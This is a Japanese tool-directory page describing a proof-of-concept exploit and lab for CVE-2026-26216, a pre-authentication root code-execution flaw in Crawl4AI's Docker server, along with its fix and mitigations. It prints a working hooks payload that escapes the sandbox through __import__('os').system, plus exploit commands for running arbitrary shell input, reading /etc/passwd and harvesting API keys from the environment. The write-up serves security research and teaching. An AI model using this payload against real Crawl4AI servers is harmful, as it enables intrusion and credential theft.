Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
EXPLOIT-CVE-2026-26216 — CVE-2026-26216の概念実証エクスプロイト。Crawl4AIのDockerデプロイメントにおけるフックインジェクションを介した未認証のリモートコード実行を示します。脆弱なラボ環境を含みます。 | Kitploit
ツール/GitHubGitHub/joaovicdev/exploit-cve-2026-26216
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発ラボと実践
GitHubjoaovicdev/exploit-cve-2026-26216

EXPLOIT-CVE-2026-26216

CVE-2026-26216の概念実証エクスプロイト。Crawl4AIのDockerデプロイメントにおけるフックインジェクションを介した未認証のリモートコード実行を示します。脆弱なラボ環境を含みます。

リポジトリを見る
41ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-26216 — Crawl4AI の hooks 経由の未認証 RCE(GHSA-5882-5rx9-xgxp)

CVSS 10.0 · pre-auth RCE · CWE-94(コードインジェクション) Crawl4AI(< 0.8.0)の Docker サーバー上での未認証のリモートコード実行。 POST /crawl エンドポイントの hooks パラメータを悪用します。 POST で JSON を 1 つ送るだけで、コンテナ内で Python が root として実行されます。

これは、セキュリティ研究および教育目的のための、自己完結型で再現可能なラボ用 PoC です。


脆弱性を一言で

POST /crawl エンドポイントは、hooks.code.<evento> フィールドに任意の Python コードを受け入れます。このコードは「手作りサンドボックス」— 制限されたビルトインの辞書 — の中で exec() によって実行されます。しかし、__import__ が許可リストに残されているため、 が可能になり、サンドボックス全体を無効化できます。

__import__('os').system(...)
root@kitploit:~
POST /crawl
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created":
        "async def hook(page, context, **kwargs):\n    __import__('os').system('id')\n    return page"
    }
  }
}

公式デプロイは JWT がデフォルトで無効で、コンテナは root として実行されるため、結果として事前認証での root RCE が発生します。

なぜ「AI ツールにおける手作りサンドボックス」は完璧な教訓なのか

サンドボックスは機能しているように見えます。open、eval、exec は削除されているため、素朴な攻撃(open('/etc/passwd'))はブロックされます。これにより誤った安心感が生まれます。しかし、危険なビルトインが1つでも残っていれば(__import__)、標準ライブラリ全体(os、subprocess、socket)をインポートでき、許可リストはただの飾りになります。ビルトインの許可リストはサンドボックスではありません。


プロジェクト構成

root@kitploit:~
CVE-2026-26216/
├── README.md
├── docker-compose.yml         # sobe o servidor vulnerável
├── vulnerable-app/
│   ├── Dockerfile             # imagem que roda como root (igual à oficial)
│   ├── requirements.txt
│   ├── server.py              # FastAPI: POST /crawl sem auth
│   └── hook_manager.py        # o sandbox fraco (a linha vulnerável está aqui)
└── exploit/
    └── exploit.py             # exploit Python (só stdlib)

忠実性に関する注記。 vulnerable-app/ は、Crawl4AI の脆弱なコードパスの簡素化された再現です(Chromium/Playwright は起動しません)。PoC を軽量かつ 100% 再現可能にするためです。サンドボックスの動作とペイロードの構造は、公式アドバイザリ GHSA-5882-5rx9-xgxp を反映しています。脆弱な行は vulnerable-app/hook_manager.py 内にマークされています。


実行方法

root@kitploit:~
# 1. sobe o alvo
docker compose up -d --build

# 2. demonstração completa
python3 exploit/exploit.py --target http://localhost:11235 --demo

# 3. comando arbitrário
python3 exploit/exploit.py --target http://localhost:11235 --cmd "id; hostname; env"

# 4. derruba
docker compose down -v

エクスプロイトが示すこと

#アクション影響
1open('/etc/passwd') 直接実行サンドボックスにブロックされる(誤った安心感)
2__import__('subprocess') + id/whoamiroot として RCE
3シェル経由の cat /etc/passwd任意のファイル読み取り
4env | grep KEYAPI キー / トークンの窃取
5echo ... > /tmp/PWNED任意のファイル書き込み

そこから先: 内部ネットワークへのピボット、クラウド認証情報の窃取、永続化など。


影響

  • 機密性: OPENAI_API_KEY、内部トークン、コンテナのシークレットの窃取。
  • 完全性: ファイルの書き込み/改ざん、バックドア。
  • 可用性: プロセスの強制終了、データの消去。
  • 横展開: コンテナは通常、内部ネットワークへのアクセスを持つ → ピボット。

これらすべてが認証なしで可能です。


修正

Crawl4AI 0.8.0 で修正されました:

  • __import__(および eval/exec/open)が許可されたビルトインから削除されました。
  • フックはデフォルトで無効 — 明示的なオプトインは CRAWL4AI_HOOKS_ENABLED=true を介して行います。

一般的な緩和策:

  • crawl4ai >= 0.8.0 にアップデートしてください。
  • Crawl4AI サーバーをインターネットに直接公開しないでください。JWT を有効にしてください。
  • コンテナを root で実行しないでください。非特権ユーザーと読み取り専用 FS を使用してください。
  • 「ビルトインの許可リスト」をその本質として扱ってください: サンドボックスではありません。 信頼できないコードを実行するには、実際の分離(gVisor、マイクロVM、 ネットワーク/FS を持たない分離プロセス、seccomp)を使用してください。

参考情報

  • GitHub Advisory — GHSA-5882-5rx9-xgxp
  • GitHub Advisory Database
  • Corgea — CVE-2026-26216
  • GitLab Advisory Database
  • miggo.io — GHSA-5882-5rx9-xgxp

免責事項

許可されたセキュリティ研究と教育のための資料です。所有しているシステム、または文書による明示的なテスト許可を得たシステムでのみ使用してください。

ツールをダウンロード